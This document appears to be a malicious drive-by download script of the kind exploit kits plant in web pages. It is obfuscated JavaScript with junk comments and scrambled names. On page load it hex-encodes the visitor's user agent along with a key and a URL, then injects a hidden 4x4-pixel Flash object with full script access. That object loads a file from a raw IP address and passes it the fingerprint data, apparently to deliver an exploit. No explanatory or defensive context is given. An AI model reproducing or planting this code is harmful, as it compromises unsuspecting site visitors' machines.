/*s37339d19985hssfj18008fs*/function hgfgerdfgdf(num, width){/*s97693d55464hfj6087fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s95995d99773hfj87616fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s94099d30715hfj52637fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s13161d82659hfj77888fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd32174hfs*/c += b + d;/*s94841d72943hfj22619fs*/e += 1;}return c;}/*s92651dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.79.38/?ODMxNTM0OTQ=&help=noise&paper=xX_QMvWdbRXQC53EKvrcT6NHMVHRHECL2YydmrHTefjaeVWkzrLFTF_xozKASASG6_FtdfJSDQ&mail=ayjEHSKQdglNxcBAgU9fyn20OEzhOd1sLT_xSKMgtHrsSXF7Fo2Qihx7MkecglwhGG61ETi-hL&inform=MTQ3MjI1ODg=&money=MTM3MzkwODQ=", ghnvbn("http://188.225.79.38/?Njg5NjA0OTI=&paper=xXzQMvWdbRXQCJ3EKvncT6NEMVHRHECL2YydmrHQefjaeVWkzrHFTF_yozKASwSG6_FtdfJSDQ&help=gift&mail=ayjEHSKQRglNxfBAgU9fyn20CEzhOd1sLT_BSKMghHrsSXF7Fo2gihx7Akdc0mwhGB6FENjOse&inform=MzgwODczNTM=&shop=MTQ0MjAxMjg=","wexykukusw"));